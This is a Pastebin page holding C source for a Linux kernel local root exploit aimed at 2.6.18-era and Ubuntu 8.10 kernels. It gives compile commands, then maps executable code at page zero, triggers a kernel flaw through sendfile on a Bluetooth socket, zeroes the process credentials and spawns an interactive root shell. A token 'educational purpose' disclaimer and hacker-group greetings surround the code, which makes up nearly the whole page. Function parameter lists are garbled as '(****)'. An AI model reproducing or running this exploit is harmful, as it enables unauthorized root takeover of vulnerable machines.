API tools faq
paste
Guest User

LOcal Root Exploit 2.6.18 2011 by http://www.hackerscafe.in/

a guest
Jun 21st, 2012
673
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.74 KB | None | 0 0
raw download clone embed print report
  1. LOcal Root Exploit 2.6.18 2011 by http://www.hackerscafe.in/
  2.  
  3.  
  4. /*
  5. *
  6. *
  7. * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  8. * 0 _ __ __ __ 1
  9. * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  10. * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  11. * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  12. * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  13. * 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  14. * 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  15. * 1 \ \____/ >> Exploit database separated by exploit 0
  16. * 0 \/___/ type (local, remote, DoS, etc.) 1
  17. * 1 0
  18. * 0 By CrosS 1
  19. * 1 0
  20. * 0 Linux 2011 1
  21. * 1 0
  22. * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  23. *
  24. * Linux 2.6.18-128.el5
  25. * Linux 2.6.9-89.EL
  26. * Ubuntu 8.10 Linux 2.6.27
  27. *
  28. * For i386 & ppc compile with the command;
  29. * gcc -w -o exploit exploit.c
  30. *
  31. * For x86_64 kernel and ppc64 Compile as;
  32. * gcc -w -m64 -o exploit exploit.c
  33. *
  34. * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
  35. *
  36. * Submit Your Exploit at [email protected] | [email protected]
  37. *
  38. * For Educational purpose Only))
  39. */
  40.  
  41. #include <stdio.h>
  42. #include <stdlib.h>
  43. #include <string.h>
  44. #include <sys/mman.h>
  45. #include <sys/sendfile.h>
  46. #include <sys/types.h>
  47. #include <sys/socket.h>
  48. #include <unistd.h>
  49.  
  50. #if !defined(__always_inline)
  51. #define __always_inline inline __attribute__((always_inline))
  52. #endif
  53.  
  54. #if defined(__i386__) || defined(__x86_64__)
  55. #if defined(__LP64__)
  56. static __always_inline unsigned long
  57. current_stack_pointer(****)
  58. {
  59. unsigned long sp;
  60.  
  61. asm volatile ("movq %%rsp,%0; " : "=r" (sp));
  62.  
  63. return sp;
  64. }
  65.  
  66. #else
  67. static __always_inline unsigned long
  68. current_stack_pointer(****)
  69. {
  70. unsigned long sp;
  71.  
  72. asm volatile ("movl %%esp,%0" : "=r" (sp));
  73.  
  74. return sp;
  75. }
  76.  
  77. #endif
  78.  
  79. #elif defined(__powerpc__) || defined(__powerpc64__)
  80. static __always_inline unsigned long
  81. current_stack_pointer(****)
  82. {
  83. unsigned long sp;
  84.  
  85. asm volatile ("mr %0,%%r1; " : "=r" (sp));
  86.  
  87. return sp;
  88. }
  89.  
  90. #endif
  91.  
  92. #if defined(__i386__) || defined(__x86_64__)
  93. #if defined(__LP64__)
  94. static __always_inline unsigned long
  95. current_task_struct(****)
  96. {
  97. unsigned long task_struct;
  98.  
  99. asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
  100.  
  101. return task_struct;
  102. }
  103.  
  104. #else
  105. #define TASK_RUNNING 0
  106.  
  107. static __always_inline unsigned long
  108. current_task_struct(****)
  109. {
  110. unsigned long task_struct, thread_info;
  111.  
  112. thread_info = current_stack_pointer() & ~(4096 - 1);
  113.  
  114. if (*(unsigned long *)thread_info >= 0xc0000000) {
  115. task_struct = *(unsigned long *)thread_info;
  116.  
  117. /*
  118. * The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
  119. * in us3r-spaCe.
  120. */
  121. if (*(unsigned long *)task_struct == TASK_RUNNING)
  122. return task_struct;
  123. }
  124.  
  125. /*
  126. * Prior to the 2.6 kernel series, the task_struct was stored at the end
  127. * of the kernel stack.
  128. */
  129. task_struct = current_stack_pointer() & ~(8192 - 1);
  130.  
  131. if (*(unsigned long *)task_struct == TASK_RUNNING)
  132. return task_struct;
  133.  
  134. thread_info = task_struct;
  135.  
  136. task_struct = *(unsigned long *)thread_info;
  137.  
  138. if (*(unsigned long *)task_struct == TASK_RUNNING)
  139. return task_struct;
  140.  
  141. return -1;
  142. }
  143.  
  144. #endif
  145.  
  146. #elif defined(__powerpc__) || defined(__powerpc64__)
  147. #define TASK_RUNNING 0
  148.  
  149. static __always_inline unsigned long
  150. current_task_struct(****)
  151. {
  152. unsigned long task_struct, thread_info;
  153.  
  154. #if defined(__LP64__)
  155. task_struct = current_stack_pointer() & ~(16384 - 1);
  156.  
  157. #else
  158. task_struct = current_stack_pointer() & ~(8192 - 1);
  159.  
  160. #endif
  161.  
  162. if (*(unsigned long *)task_struct == TASK_RUNNING)
  163. return task_struct;
  164.  
  165. thread_info = task_struct;
  166.  
  167. task_struct = *(unsigned long *)thread_info;
  168.  
  169. if (*(unsigned long *)task_struct == TASK_RUNNING)
  170. return task_struct;
  171.  
  172. return -1;
  173. }
  174.  
  175. #endif
  176.  
  177. #if defined(__i386__) || defined(__x86_64__)
  178. static unsigned long uid, gid;
  179.  
  180. static int
  181. change_cred(****)
  182. {
  183. unsigned int *task_struct;
  184.  
  185. task_struct = (unsigned int *)current_task_struct();
  186.  
  187. while (task_struct) {
  188. if (task_struct[0] == uid && task_struct[1] == uid &&
  189. task_struct[2] == uid && task_struct[3] == uid &&
  190. task_struct[4] == gid && task_struct[5] == gid &&
  191. task_struct[6] == gid && task_struct[7] == gid) {
  192. task_struct[0] = task_struct[1] =
  193. task_struct[2] = task_struct[3] =
  194. task_struct[4] = task_struct[5] =
  195. task_struct[6] = task_struct[7] = 0;
  196. break;
  197. }
  198.  
  199. task_struct++;
  200. }
  201.  
  202. return -1;
  203. }
  204.  
  205. #elif defined(__powerpc__) || defined(__powerpc64__)
  206. static int
  207. change_cred(****)
  208. {
  209. unsigned int *task_struct;
  210.  
  211. task_struct = (unsigned int *)current_task_struct();
  212.  
  213. while (task_struct) {
  214. if (!task_struct[0]) {
  215. task_struct++;
  216. continue;
  217. }
  218.  
  219. if (task_struct[0] == task_struct[1] &&
  220. task_struct[0] == task_struct[2] &&
  221. task_struct[0] == task_struct[3] &&
  222. task_struct[4] == task_struct[5] &&
  223. task_struct[4] == task_struct[6] &&
  224. task_struct[4] == task_struct[7]) {
  225. task_struct[0] = task_struct[1] =
  226. task_struct[2] = task_struct[3] =
  227. task_struct[4] = task_struct[5] =
  228. task_struct[6] = task_struct[7] = 0;
  229. break;
  230. }
  231.  
  232. task_struct++;
  233. }
  234.  
  235. return -1;
  236. }
  237.  
  238. #endif
  239.  
  240. #define PAGE_SIZE getpagesize()
  241.  
  242. int
  243. main(****)
  244. {
  245. char *addr;
  246. int out_fd, in_fd;
  247. char template[] = "/tmp/tmp.XXXXXX";
  248.  
  249. #if defined(__i386__) || defined(__x86_64__)
  250. uid = getuid(), gid = getgid();
  251.  
  252. #endif
  253.  
  254. if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
  255. MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
  256. perror("mmap");
  257. exit(EXIT_FAILURE);
  258. }
  259.  
  260. #if defined(__i386__) || defined(__x86_64__)
  261. #if defined(__LP64__)
  262. addr[0] = '\xff';
  263. addr[1] = '\x24';
  264. addr[2] = '\x25';
  265. *(unsigned long *)&addr[3] = 8;
  266. *(unsigned long *)&addr[8] = (unsigned long)change_cred;
  267.  
  268. #else
  269. addr[0] = '\xff';
  270. addr[1] = '\x25';
  271. *(unsigned long *)&addr[2] = 8;
  272. *(unsigned long *)&addr[8] = (unsigned long)change_cred;
  273.  
  274. #endif
  275.  
  276. #elif defined(__powerpc__) || defined(__powerpc64__)
  277. #if defined(__LP64__)
  278. /*
  279. * The use of function descriptors by the Power 64-bit ELF ABI requires
  280. * the use of a fake function descriptor.:P
  281. */
  282. *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
  283.  
  284. #else
  285. addr[0] = '\x3f';
  286. addr[1] = '\xe0';
  287. *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
  288. addr[4] = '\x63';
  289. addr[5] = '\xff';
  290. *(unsigned short *)&addr[6] = (unsigned short)change_cred;
  291. addr[8] = '\x7f';
  292. addr[9] = '\xe9';
  293. addr[10] = '\x03';
  294. addr[11] = '\xa6';
  295. addr[12] = '\x4e';
  296. addr[13] = '\x80';
  297. addr[14] = '\x04';
  298. addr[15] = '\x20';
  299.  
  300. #endif
  301.  
  302. #endif
  303.  
  304. if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
  305. perror("socket");
  306. exit(EXIT_FAILURE);
  307. }
  308.  
  309. if ((in_fd = mkstemp(template)) == -1) {
  310. perror("mkstemp");
  311. exit(EXIT_FAILURE);
  312. }
  313.  
  314. if(unlink(template) == -1) {
  315. perror("unlink");
  316. exit(EXIT_FAILURE);
  317. }
  318.  
  319. if (ftruncate(in_fd, PAGE_SIZE) == -1) {
  320. perror("ftruncate");
  321. exit(EXIT_FAILURE);
  322. }
  323.  
  324. sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
  325.  
  326. execl("/bin/sh", "sh", "-i", NULL);
  327.  
  328. exit(EXIT_SUCCESS);
  329. }
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!